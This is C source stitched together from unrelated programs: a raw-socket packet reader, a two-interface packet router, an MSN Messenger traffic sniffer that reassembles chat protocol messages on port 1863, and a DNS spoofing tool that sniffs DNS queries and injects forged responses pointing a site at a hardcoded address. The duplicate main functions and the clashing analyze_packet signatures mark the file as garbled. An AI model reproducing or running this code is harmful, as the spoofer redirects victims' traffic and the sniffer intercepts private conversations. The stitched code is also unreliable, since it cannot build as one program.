int main() {
int sockfd;
int size;
u_char buf[65535];
if((sockfd=init_raw_socket("eth1")) == -1) return(-1);
/* get_ether_info() {
}*/
while (1) {
if((size=read(sockfd, buf, sizeof(buf))) <= 0) perror("read()");
analyze_packet(buf, size);
}
close(sockfd);
return(0);
}
int router() {
struct pollfd targets[DEVICE_NUM];
int i;
int status,size;
u_char buf[2048];
targets[0].fd = device[0].soc;
targets[0].events = POLLIN | POLLERR;
targets[1].fd = device[1].soc;
targets[1].events = POLLIN | POLLERR;
while(1) {
switch(status = poll(targets, DEVICE_NUM, 100)) {
case -1:
if (errno != EINTR) {
perror("poll");
}
break;
case 0:
break;
default:
for(i = 0; i < DEVICE_NUM; i++) {
if (targets[i].revents & (POLLIN|POLLERR)) {
if ((size = read(device[i].soc, buf, sizeof(buf))) <= 0) {
perror("cannnot read device");
} else {
if (analyze_packet(i, buf, size) != -1) {
if ((size = write(device[get_opposite_dev(i)].soc, buf, size)) <= 0) {
perror("cannnot write device");
}
}
}
}
}
break;
}
}
}
void process_packet (long packet_id, struct pcap_pkthdr *header, const u_char *packet)
{
struct tm *ltime;
char timestr[16];
/* Make sure we have enough data to read the IP header*/
if ( header->caplen < (data_offset + sizeof (struct ip_header)))
return;
/* Get IP header, which comes after the datalink header (14 bytes for ethernet) */
struct ip_header *ih = (ip_header *) (packet + data_offset);
/* TCP header comes right after */
int ip_len = (ih->ver_ihl & 0xf) * 4;
struct tcp_header *th = (tcp_header *) ((u_char*)ih + ip_len);
if ( ( (u_char *) th+sizeof (struct tcp_header)) > (packet + header->caplen) )
{
/* the TCP header ends beyond the received data */
return;
}
int source_port = ntohs (th->th_sport);
int destination_port = ntohs (th->th_dport);
if (source_port!=1863 && destination_port!=1863)
return;
u_short th_len = (th->off_unused& 0xF0) >> 4;
// Convert time
ltime=localtime(&header->ts.tv_sec);
strftime( timestr, sizeof timestr, "%H:%M:%S", ltime);
u_char *data_onpacket = (u_char *) th +th_len*4;
int data_onpacket_size = header->caplen - th_len*4 - ip_len - data_offset;
int comesfromA = 0;
int data_size;
u_char *payload;
int allzeros = 1;
for (int i=0; i<data_onpacket_size; i++)
{
if (data_onpacket[i]!=0)
{
allzeros=0;
break;
}
}
if (allzeros)
{
log_debug (5, "Ignoring empty or all-zero packet");
return;
}
// Is this packet part of a connection known to be MSN for sure?
struct msn_connection *ci = get_or_create_msn_connection (&ih->saddr, source_port, &ih->daddr,
destination_port, create_no);
log_debug (3, "Processing packet with ID: %ld", packet_id);
if (ci==NULL)
{
// No.
log_debug (3, "Packet is not from a known conversation");
payload=(u_char *) malloc (data_onpacket_size);
memcpy (payload, data_onpacket, data_onpacket_size);
data_size=data_onpacket_size;
}
else
{
if (is_from_A(ci, &ih->saddr, source_port)==1)
{
log_debug (3, "Packet is from a known conversation (A), pending =%d", ci->pending_A_length);
payload=(u_char *) malloc (data_onpacket_size + ci->pending_A_length);
if (ci->pending_A_length>0)
memcpy (payload, ci->pending_A, ci->pending_A_length);
memcpy (payload + ci->pending_A_length, data_onpacket, data_onpacket_size);
data_size=data_onpacket_size + ci->pending_A_length;
ci->pending_A_length=0;
if (ci->pending_A!=NULL)
{
free (ci->pending_A);
}
ci->pending_A=NULL;
comesfromA=1;
}
else
{
log_debug (3, "Packet is from a known conversation (B), pending =%d", ci->pending_B_length);
payload=(u_char *) malloc (data_onpacket_size + ci->pending_B_length);
if (ci->pending_B_length>0)
memcpy (payload, ci->pending_B, ci->pending_B_length);
memcpy (payload + ci->pending_B_length, data_onpacket, data_onpacket_size);
data_size=data_onpacket_size + ci->pending_B_length;
ci->pending_B_length=0;
if (ci->pending_B!=NULL)
{
free (ci->pending_B);
}
ci->pending_B=NULL;
comesfromA=0;
}
}
log_debug (3, "Real size = %d, current size=%d",data_onpacket_size, data_size);
int pos = 0;
u_char *ref = payload;
while (data_size)
{
log_debug (5, "In while (data_size)");
int packet_type;
if (data_size<3)
packet_type= PT_UNKNOWN;
else
packet_type = analyze_packet (payload);
log_debug (5, "data_size = %d, packet type =%d", data_size, packet_type);
char fromto[1024];
sprintf(fromto, "%d.%d.%d.%d:%d -> %d.%d.%d.%d:%d",
ih->saddr.byte1,
ih->saddr.byte2,
ih->saddr.byte3,
ih->saddr.byte4, source_port,
ih->daddr.byte1,
ih->daddr.byte2,
ih->daddr.byte3,
ih->daddr.byte4, destination_port);
log_debug (3, "%s",fromto);
log_debug (5, "%s.%.6d longitud:%d (cap: %d)", timestr, header->ts.tv_usec, header->len, header->caplen);
u_char prefix[1024];
sprintf ((char *) prefix, "%s | %s | ",timestr, fromto);
// int processed;
int bytes_parsed=-1; // Number of bytes the handler managed
// Vamos a ver si es un MSG y si tiene buena
// pinta despues
char line_x[30]="";
switch (packet_type)
{
case PT_UNKNOWN:
if (ci==NULL)
{
log_debug (3, "Unknown data from an unknown conversation, skipping.");
bytes_parsed = data_size; // No sabemos lo que es, mejor anular todo el paquete
break;
}
else
{
log_debug (3, "Unknown data but from a known MSN conversation, attempting to skip and resume");
}
line_x[0]=0;
for (int j=0; j<data_size; j++)
{
sprintf (line_x+strlen (line_x), "%02X ", payload[j]);
if (j%8==0)
{
log_debug (5, "%s",line_x);
line_x[0] = 0;
}
}
if (strlen (line_x)>0)
log_debug (5,"%s",line_x);
line_x[0]=0;
for (int j=0; j<data_size; j++)
{
sprintf (line_x+strlen (line_x), "%c", payload[j]);
if (j%8==0)
{
log_debug (5, "%s",line_x);
line_x[0]=0;
}
}
if (strlen (line_x)>0)
log_debug (5,"%s",line_x);
bytes_parsed = get_new_line_malloc (NULL,payload,data_size);
break;
case PT_MSN_SYN:
// List sync.
bytes_parsed = handler_msn_syn (payload, data_size, ih->saddr, source_port,
ih->daddr, destination_port);
break;
case PT_MSN_MSG:
bytes_parsed = handler_msn_msg (payload, data_size, ih->saddr, source_port,
ih->daddr, destination_port);
break;
case PT_MSN_USR: // User identification and authentification
bytes_parsed = handler_msn_usr (payload, data_size, ih->saddr, source_port,
ih->daddr, destination_port);
break;
case PT_MSN_ANS: /* Entry in a switchboard after being invited */
bytes_parsed = handler_msn_ans (payload, data_size, ih->saddr, source_port,
ih->daddr, destination_port);
break;
case PT_MSN_IRO: /* Initial user list in a switchboard */
bytes_parsed = handler_msn_iro (payload, data_size, ih->saddr, source_port,
ih->daddr, destination_port);
break;
case PT_MSN_JOI: // Usuario entrando en el switchboard
bytes_parsed = handler_msn_joi (payload, data_size, ih->saddr, source_port,
ih->daddr, destination_port);
break;
case PT_MSN_OUT: // Session termination
bytes_parsed = handler_msn_out (payload, data_size, ih->saddr, source_port,
ih->daddr, destination_port);
break;
case PT_MSN_IGNORE: // Ignore these packets
bytes_parsed = handler_msn_ignore (payload, data_size, ih->saddr, source_port,
ih->daddr, destination_port);
break;
case PT_MSN_BYE: // User leaving switchboard
bytes_parsed = handler_msn_bye (payload, data_size, ih->saddr, source_port,
ih->daddr, destination_port);
break;
case PT_MSN_CHG: // User changing status
bytes_parsed = handler_msn_chg (payload, data_size, ih->saddr, source_port,
ih->daddr, destination_port);
break;
case PT_MSN_ILN: // Initial user status
bytes_parsed = handler_msn_iln (payload, data_size, ih->saddr, source_port,
ih->daddr, destination_port);
break;
case PT_MSN_NLN: // User changing status
bytes_parsed = handler_msn_nln (payload, data_size, ih->saddr, source_port,
ih->daddr, destination_port);
break;
case PT_MSN_LST: // Contact list
bytes_parsed = handler_msn_lst (payload, data_size, ih->saddr, source_port,
ih->daddr, destination_port);
break;
case PT_MSN_PRP: // Contact list
bytes_parsed = handler_msn_prp (payload, data_size, ih->saddr, source_port,
ih->daddr, destination_port);
break;
case PT_MSN_FLN: // Contact list
bytes_parsed = handler_msn_fln (payload, data_size, ih->saddr, source_port,
ih->daddr, destination_port);
break;
default:
log_debug (0, "this is a bug! (packet_Type=%d)", packet_type);
bytes_parsed = data_size; /* Don't know what it is, skip the whole thing */
break;
}
switch (bytes_parsed)
{
case NOT_MSN:
bytes_parsed = data_size; /* Don't know what it is, skip the whole thing */
data_size = 0;
log_debug (3, "Skipping rest of packet");
break;
case LINE_INCOMPLETE:
log_debug (3, "Processed = LINE_INCOMPLETE, no complete line available");
if (ci!=NULL) /* It's from a known conversation, store the rest of stuff for later */
{
if (comesfromA)
{
log_debug (3, "It's from a known conversation (A > B), added to pending data");
if (ci->pending_A!=NULL)
log_debug (0, "pending_A has data!");
ci->pending_A=(u_char *) malloc (data_size);
memcpy (ci->pending_A,payload,data_size);
ci->pending_A_length=data_size;
}
else
{
log_debug (3, "It's from a known conversation (B > A), added to pending data");
if (ci->pending_B!=NULL)
log_debug (0, "pending_B has data!");
ci->pending_B=(u_char *) malloc (data_size);
memcpy (ci->pending_B,payload,data_size);
ci->pending_B_length=data_size;
}
if (ci->pending_A_length>8192 || ci->pending_B_length>8192)
{
/* No payload is this long - skip everything */
log_debug (3, "Payload too long, skipping everything");
remove_msn_connection(ci);
}
}
bytes_parsed = data_size; /* Get out */
data_size = 0;
break;
case CONN_DESTROYED:
bytes_parsed = data_size; /* Pointless to go on... */
data_size = 0;
break;
case OUT_OF_MEMORY:
log_debug (0, "Out of memory somewhere, likely to crash soon");
bytes_parsed = data_size; /* Get out */
data_size = 0;
break;
default:
data_size -=bytes_parsed;
payload += bytes_parsed;
}
}
log_debug (5, "Freeing stuff");
/* if (dump!=NULL)
free (dump); */
if (ref!=NULL)
free (ref);
log_debug (5, "Leaving process_packet");
}
int main(int argc, char **argv) {
char *spoof_addr;
char *site_name;
char temp_site[128];
char *device;
char filter[1024]; /* Capture filter */
char errbuf[PCAP_ERRBUF_SIZE]; /* Error buffer */
pcap_t* capdev; /* Capturing Device */
const u_char *packet = NULL;
struct pcap_pkthdr pcap_hdr; /* Pcap packet header */
libnet_t *handler; /* Libnet handler */
int var;
/* reserve the space for the spoofed packet */
memset(&spoofpacket, '\0', sizeof(struct sp));
/* get the spoofing IP address from input */
spoof_addr = "222.106.38.120";
site_name = "example.com";
if (argc >= 2)
spoof_addr = argv[1];
if (argc >= 3)
site_name = argv[2];
if (strncmp(site_name, "www", 3) != 0) {
strncpy(temp_site, "www.", 4);
strcpy(temp_site+4, site_name);
site_name = temp_site;
}
/* get a device to sniff on */
device = pcap_lookupdev(errbuf);
if (device == NULL) {
printf("%s\n", errbuf);
exit(1);
}
strcpy(filter, "udp dst port 53");
/* Setup for sniffering */
capdev = set_cap_dev(device, filter);
printf("Sniffering on: %s\n", device);
printf("Spoofing address: %s\n", spoof_addr);
for (;;)
{
packet = pcap_next(capdev, &pcap_hdr);
/* Grab a packet */
/**** USE: pcap function to grab next packet****/
if (packet == NULL)
{
continue;
}
// printf("Packet Length%d\n", pcap_hdr.len);
//printf("Return value: %d", var);
/* If the packet is a DNS query, create a packet */
if ((analyze_packet(packet, (int)pcap_hdr.caplen, spoof_addr, site_name)) == 1)
{
// printf("DNS packet found\n");
// Inject the spoofed DNS response
// printf("Device: %s", device);
spoof_dns(device);
// printf("YAY! DNS packet sent\n");
// return 1;
}
}
return 0;
}
